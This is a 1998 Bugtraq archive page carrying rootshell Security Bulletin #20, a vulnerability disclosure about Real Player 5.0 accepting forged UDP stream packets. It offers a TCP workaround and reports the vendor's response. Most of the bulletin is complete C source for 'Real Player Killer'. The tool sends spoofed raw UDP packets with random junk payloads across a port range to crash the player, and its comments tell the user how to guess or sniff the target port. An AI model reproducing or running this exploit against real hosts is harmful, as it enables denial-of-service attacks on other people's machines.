Bugtraq mailing list archives
[rootshell] Security Bulletin #20
From: aleph1 () DFW NET (Aleph One)
Date: Mon, 6 Jul 1998 17:16:39 -0500
Date: 6 Jul 1998 15:31:00 -0000 From: announce-outgoing () rootshell com Cc: recipient list not shown: ; Subject: [rootshell] Security Bulletin #20 www.rootshell.com Security Bulletin #20 July 6th, 1998 [ http://www.rootshell.com/ ] ---------------------------------------------------------------------- To unsubscribe from this mailing list send e-mail to majordomo () rootshell com with "unsubscribe announce" in the BODY of the message. Send submissions to info () rootshell com. Messages sent will not be sent to other members on this list unless it is featured in a security bulletin. An archive of this list is available at : http://www.rootshell.com/mailinglist-archive ---------------------------------------------------------------------- 01. Real Player 5.0 Killer -------------------------- Real Networks has been notified of the problem and has stated that they will make a fix for their upcoming G2 release and are considering making a patch available for all of the 5.0 players out there. The only available workaround at this time is to force your player to use TCP instead of UDP for streams in the transport area of the preferences menu. /* * Real Player Killer - 6/26/98 * * (C) 1998 Kit Knox <kit () connectnet com> * * [ http://www.rootshell.com/ ] * * Real Player 5.0 for Windows95 and Linux (others untested) do not check * the validity of incoming UDP packets used when receiving audio/video. * * If you are able to determine or brute force the destination port of the * stream you are able to crash the player and cause it to use 100% of * idle CPU. I would not be surprised if there are numerous buffer * overflows in this area as well. The client does not even check if the * source IP address is the one it is receiving data from. Any source IP * can be used. * * Generally the stack will start with port 1025 and go up. Starting there * and going up will generally give you good results. If you are able to * sniff the network you will know the exact port and not have to guess. * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <linux/udp.h> #include <netdb.h> #define err(x) { fprintf(stderr, x); exit(1); } #define errs(x, y) { fprintf(stderr, x, y); exit(1); } char real_data[] = { 0x00, 0x00 }; unsigned short in_cksum (addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return (answer); } int sendpkt_udp (sin, s, data, datalen, saddr, daddr, sport, dport) struct sockaddr_in *sin; unsigned short int s, datalen, sport, dport; unsigned long int saddr, daddr; char *data; { struct iphdr ip; struct udphdr udp; static char packet[8192]; char crashme[500]; int i; ip.ihl = 5; ip.version = 4; ip.tos = rand () % 100;; ip.tot_len = htons (28 + datalen); ip.id = htons (31337 + (rand () % 100)); ip.frag_off = 0; ip.ttl = 255; ip.protocol = IPPROTO_UDP; ip.check = 0; ip.saddr = saddr; ip.daddr = daddr; ip.check = in_cksum ((char *) &ip, sizeof (ip)); udp.source = htons (sport); udp.dest = htons (dport); udp.len = htons (8 + datalen); udp.check = (short) 0; memcpy (packet, (char *) &ip, sizeof (ip)); memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp)); memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, datalen); for (i = 0; i < 500; i++) crashme[i] = rand () % 255; memcpy (packet + sizeof (ip) + sizeof (udp) + datalen, crashme, 500); return (sendto (s, packet, sizeof (ip) + sizeof (udp) + datalen + 500, 0, (struct sockaddr *) sin, sizeof (struct sockaddr_in))); } unsigned int lookup (host) char *host; { unsigned int addr; struct hostent *he; addr = inet_addr (host); if (addr == -1) { he = gethostbyname (host); if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL)) return 0; bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list)); } return (addr); } void main (argc, argv) int argc; char **argv; { unsigned int saddr, daddr; struct sockaddr_in sin; int s, i; if (argc != 5) errs ("Usage: %s <source_addr> <dest_addr> <low port> <high port>\n", argv[0]); printf("Real Player Killer - http://www.rootshell.com/\n\n"); if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) err ("Unable to open raw socket.\n"); if (!(saddr = lookup (argv[1]))) err ("Unable to lookup source address.\n"); if (!(daddr = lookup (argv[2]))) err ("Unable to lookup destination address.\n"); sin.sin_family = AF_INET; sin.sin_port = 9; sin.sin_addr.s_addr = daddr; for (i=atoi(argv[3]); i<atoi(argv[4]); i++) if ((sendpkt_udp (&sin, s, &real_data, sizeof (real_data), saddr, daddr, 2014, i)) == -1) { perror ("sendpkt_udp"); err ("Error sending the UDP packet.\n"); } printf("Done!\n"); } ---------------------------------------------------------------------- To unsubscribe from this mailing list send e-mail to majordomo () rootshell com with "unsubscribe announce" in the BODY of the message. Send submissions to info () rootshell com. Messages sent will not be sent to other members on this list unless it is featured in a security bulletin. An archive of this list is available at : http://www.rootshell.com/mailinglist-archive ----------------------------------------------------------------------
Current thread:
- Re: Sun libnsl lameness, (continued)
- Re: Sun libnsl lameness Allanah Myles (Jul 06)
- Re: Sun libnsl lameness mib () DEAKIN EDU AU (Jul 08)
- Re: Sun libnsl lameness Scott Stubbs (Jul 09)
- Sun libnsl patches Mike Sorsen (Jul 09)
- Re: Sun libnsl lameness Matt Conover (Jul 08)
- DoS: ANS Interlock Firewall Chris A. Henesy (Jul 09)
- Administrivia Aleph One (Jul 09)
- Re: Sun libnsl lameness mib () DEAKIN EDU AU (Jul 08)
- Re: Sun libnsl lameness Andy Polyakov (Jul 03)
- Re: Sun libnsl lameness Matt Conover (Jul 03)
- UPDATE: SSH insertion attack Ivan Arce (Jul 03)
- [rootshell] Security Bulletin #20 Aleph One (Jul 06)
- Re: Sun libnsl lameness Edward Lewis EDU SE Nashville (Jul 09)
- Re: Sun libnsl lameness Edward Lewis EDU SE Nashville (Jul 10)
- Re: Sun libnsl lameness Allanah Myles (Jul 06)